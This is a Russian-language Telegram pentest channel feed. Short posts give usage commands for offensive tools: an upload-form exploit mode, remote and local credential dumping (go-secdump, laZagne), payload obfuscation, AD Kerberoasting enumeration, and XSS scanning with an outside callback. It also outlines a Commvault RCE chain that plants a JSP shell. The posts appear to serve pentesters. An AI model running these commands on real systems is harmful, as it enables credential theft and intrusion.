Инструмент, предназначенный для тестирования механизмов загрузки файлов (upload forms). Использует различные методы поиска ошибок, чтобы упростить процесс выявления и эксплуатации уязвимостей.
С простенькими формами и уязвимостями справляется, тестировалось на машине HackTheBox - Magic
Работает с request файлом взятым из
Установка:
git clone https://github.com/sAjibuu/Upload_Bypass.git
pip install -r requirements.txt
Режим детектирования:
python upload_bypass.py -r test -s 'File uploaded successfully' -E php -D /uploads --burp --detect
Режим эксплуатации:python upload_bypass.py -r test -s 'File uploaded successfully' -E php -D /uploads --burp --exploit
Anti malware mode:python upload_bypass.py -r test -s 'File uploaded successfully' -E php -D /uploads --burp --anti_malware
#web #pentest #upload #python #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек
Охотники на баги и где они обитают: итоги опроса о багхантинге
#bugbounty #bughunters #багбаунти #багхантинг
В мире, где цифровые технологии пронизывают все аспекты жизни, безопасность разработки становится не просто важной, а критически необходимой. Однако с ростом сложности IT-решений и ускорением темпов обновлений обеспечить безупречную защиту данных и пользовательского опыта становится всё труднее. В таких условиях компании всё чаще обращаются к сообществу, запуская программы багхантинга — поиска уязвимостей силами внешних специалистов за вознаграждение.
Мы решили узнать, как российское IT-сообщество воспринимает багхантинг, и провели опрос среди читателей Хабра. Более 300 человек прошли тест до конца, около 1000 ответили на часть вопросов, что позволило нам составить портрет современного багхантера. Спасибо всем участникам! А теперь давайте разберёмся, что же удалось выяснить. В конце каждого раздела дадим галерею с итогами опроса, чтобы вы могли посмотреть на полное распределение процентов по ответам.
P.S. очень классные картинки нагенерили))
🔗 Изучить исследдование
🌚 @poxek | 🌚 blog.poxek.cc | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#bugbounty #bughunters #багбаунти #багхантинг
PT сделали исследование и написали спец статью для Хабр о портрете багхантеров, получилось интересно, хоть и с призмой явного перевеса в "свою сторону"))
В мире, где цифровые технологии пронизывают все аспекты жизни, безопасность разработки становится не просто важной, а критически необходимой. Однако с ростом сложности IT-решений и ускорением темпов обновлений обеспечить безупречную защиту данных и пользовательского опыта становится всё труднее. В таких условиях компании всё чаще обращаются к сообществу, запуская программы багхантинга — поиска уязвимостей силами внешних специалистов за вознаграждение.
Мы решили узнать, как российское IT-сообщество воспринимает багхантинг, и провели опрос среди читателей Хабра. Более 300 человек прошли тест до конца, около 1000 ответили на часть вопросов, что позволило нам составить портрет современного багхантера. Спасибо всем участникам! А теперь давайте разберёмся, что же удалось выяснить. В конце каждого раздела дадим галерею с итогами опроса, чтобы вы могли посмотреть на полное распределение процентов по ответам.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Часто же бывает такое, что необходимо найти машины, на которых работают определенные пользователи. Скрипт показывает сессии на всех хостах, которые дернет из LDAP.
https://github.com/p0dalirius/FindUnusualSessions
#pentest #redteam #ad #enum
https://github.com/p0dalirius/FindUnusualSessions
#pentest #redteam #ad #enum
🔥5🫡1
Инструмент для удалённого извлечения хешей и копирования чувствительных
Добавлено:
Go-secdump can now dump the registry secrets without changing any DACLs thanks to the SeBackupPrivilege
Пример:
./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --sam
./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --lsa
./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --dcc2
Relay:
./go-secdump.exe --host 192.168.0.100 -n --relay
Основные опции:
--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>
#soft #golang #redteam #gosecdump
Please open Telegram to view this post
VIEW IN TELEGRAM
Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на
UPD. 2.11
Установка:
go install github.com/hahwul/dalfox/v2@latest
Пример:
dalfox url http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url
#soft #dalfox #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Offensive Xwitter
😈 [ hasherezade @hasherezade ]
Centralized resource for listing and organizing known injection techniques and POCs:
🔗 https://github.com/itaymigdal/awesome-injection
🐥 [ tweet ][ quote ]
Centralized resource for listing and organizing known injection techniques and POCs:
🔗 https://github.com/itaymigdal/awesome-injection
🐥 [ tweet ][ quote ]
👍3
GitHub
GitHub - DosX-dev/Astral-PE: Astral-PE is a low-level mutator (Headers/EP obfuscator) for native Windows PE files (x32/x64)
Astral-PE is a low-level mutator (Headers/EP obfuscator) for native Windows PE files (x32/x64) - DosX-dev/Astral-PE
Протектор для
Изменяет важные структуры - timestamps, headers, section flags, debug info, import/export
./Astral-PE.exe payload.exe -o payload_clean.exe
#astralpe #mutator
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Инструмент для восстановления забытых 😄 паролей, написан на Python
UPD. Автор добавил поддержку Яндекс браузера
Примеры использования:
laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password
#lazagne #python #password #recovery #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5😁2 2 1
Локальный Kubernetes в Linux, Windows и MacOS
Фичи:
▪️ LoadBalancer▪️ Multi-cluster▪️ NodePorts▪️ Persistent Volumes▪️ Ingress
Установка в Linux:
curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube_latest_amd64.deb
sudo dpkg -i minikube_latest_amd64.deb
Основные команды:
minikube start
minikube dashboard
kubectl create deployment hello-minikube --image=kicbase/echo-server:1.0
kubectl expose deployment hello-minikube --type=NodePort --port=8080
minikube service hello-minikube
minikube start --kubernetes-version=latest
minikube stop
minikube delete
minikube delete --all
#kubernetes #minikube #devops
Please open Telegram to view this post
VIEW IN TELEGRAM
🤷1 1
CYBERDOM
Abusing the Windows Update Stack to Gain SYSTEM Access (CVE-2025-21204)
The CVE-2025-21204 is precisely that kind of vulnerability. It doesn't require a zero-day exploit or complex memory corruption chain. It doesn't need a phishing campaign or a dropped malware loader. All it takes is: A misused filesystem trust, a writable…
Повышение привилегий (LPE) в
C:\inetpub, обычно используется в рамках работы веб-сервера IIS, у меня например появилась. Это если что такой фикс от микрософт 😁 и удалять ее не стоит. #windows #lpe #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
DriveThru Car Hacking Fast Food, Faster Data Breach
KernJC Automated Vulnerable Environment Generation for Linux Kernel Vulnerabilities
vCenter Lost How the DCERPC Vulnerabilities Changed the Fate of ESXi
etc.
#pentest #blackhat #blackhatasia
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝12 2
Отличный инструмент для поиска и сбора информации в
Представлен в 2х вариантах, стандарт и лайт
Полная версия имеет встроенный модуль SharpHound для сбора информации в
UPD. Добавили поддержку модуля для Bloodhound CE
Стандартный запуск:
Import-Module .\adPEAS.ps1
Invoke-adPEAS
Доступные модули:
Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках
Rights - поиск различных прав, например LAPS, DCSync и т.д.
GPO - базовая информация о групповых политиках
ADCS - информация о центрах сертификации
Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.
Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей
Accounts - информация об аккаунтах
Computer - AD DS, AD CS, Exchange серверы и т.д.
BloodHound - сборщик данных для BH
Варианты запуска:
Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor
Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'
Определенная УЗ:
$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred
Модули:
Invoke-adPEAS -Module Domain
Invoke-adPEAS -Module Rights
Invoke-adPEAS -Module GPO
Invoke-adPEAS -Module ADCS
Invoke-adPEAS -Module Creds
Invoke-adPEAS -Module Delegation
Invoke-adPEAS -Module Accounts
Invoke-adPEAS -Module Computer
Invoke-adPEAS -Module Bloodhound -Scope All
#soft #powershell #activedirectory #enumeration
Please open Telegram to view this post
VIEW IN TELEGRAM
Новый инструмент в
Включение:
Параметры > Система > Для разработчиков > Включить sudo
Поддерживает 3 режима работы:
--new-window - в новом окне
--inline - в текущем окне
--disable-input - в текущем окне с отключенным вводом в целевое приложение
По умолчанию работает в режиме нового окна, изменить значение:
# forceNewWindow, disableInput, normal
sudo config --enable normal
sudo netstat -ab
Есть принципиальные отличия от runas:
sudo работает только с правами администратора и использует UAC для подтверждения
sudo не поддерживает выполнение команд от имени других пользователей
sudo может выполняться в текущем сеансе консоли (в зависимости от режима), тогда как runas всегда запускает новый процесс
Банальная унификация,
sudo app.exe гораздо привычнее чем runas /user:Администратор "C:\path\app.exe"Почему я об этом решил написать ? Все таки, это стандартная утилита с довольно интересным и опасным функционалом и я уверен что, мы слышим о ней далеко не в последний раз 😅
UPD. Ключи реестра:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo" /v Enabled
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo" /v Enabled /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo" /v Enabled /t REG_DWORD /d 0 /f
#windows #sudo
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6 1
watchTowr Labs
Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028)
As we pack our bags and prepare for the adult-er version of BlackHat (that apparently doesn’t require us to print out stolen mailspoolz to hand to people at their talks), we want to tell you about a recent adventure - a heist, if you will.
No heist story…
No heist story…
Path traversal уязвимость приводящая к выполнению произвольного кода (RCE) без аутентификации
/commandcenter/deloyWebpackage.do, в результате чего Commvault получит ZIP-файл с внешнего сервера../../Reports/MetricsUpload/shell/commandcenter/deployWebpackage.do/reports/MetricsUpload/shell/.tmp/dist-cc/dist-cc/shell.jspРейтинг CVSS - 9.0
Уязвимость устранена в версии 11.38
#cve #rce #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Генератор .txt файлов для обучения LLM
Можно добавить
llmstxt.new перед любым URL, например - https://www.llmstxt.new/https://szybnev.ccЕсть API:
# Start LLMs.txt generation
curl -X POST "https://api.firecrawl.dev/v1/llmstxt" \
-H "Authorization: Bearer your_api_key" \
-H "Content-Type: application/json" \
-d '{
"url": "https://example.com",
"maxUrls": 2,
"showFullText": true
}'
# Check generation status
curl -X GET "https://api.firecrawl.dev/v1/llmstxt/job_id" \
-H "Authorization: Bearer your_api_key"
from firecrawl import FirecrawlApp
# Initialize the client
firecrawl = FirecrawlApp(api_key="your_api_key")
# Generate LLMs.txt with polling
results = firecrawl.generate_llms_text(
url="https://example.com",
max_urls=2,
show_full_text=True
)
# Access generation results
if results.success:
print(f"Status: {results.status}")
print(f"Generated Data: {results.data}")
else:
print(f"Error: {results.error}")
#llm
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Offensive Xwitter
😈 [ Toffy @toffyrak ]
I have just released my first tool: GPOHound 🚀
GPOHound is an offensive tool for dumping and analysing GPOs. It leverages BloodHound data and enriches it with insights extracted from the analysis.
Check it out here:
🔗 https://github.com/cogiceo/GPOHound
🐥 [ tweet ]
I have just released my first tool: GPOHound 🚀
GPOHound is an offensive tool for dumping and analysing GPOs. It leverages BloodHound data and enriches it with insights extracted from the analysis.
Check it out here:
🔗 https://github.com/cogiceo/GPOHound
🐥 [ tweet ]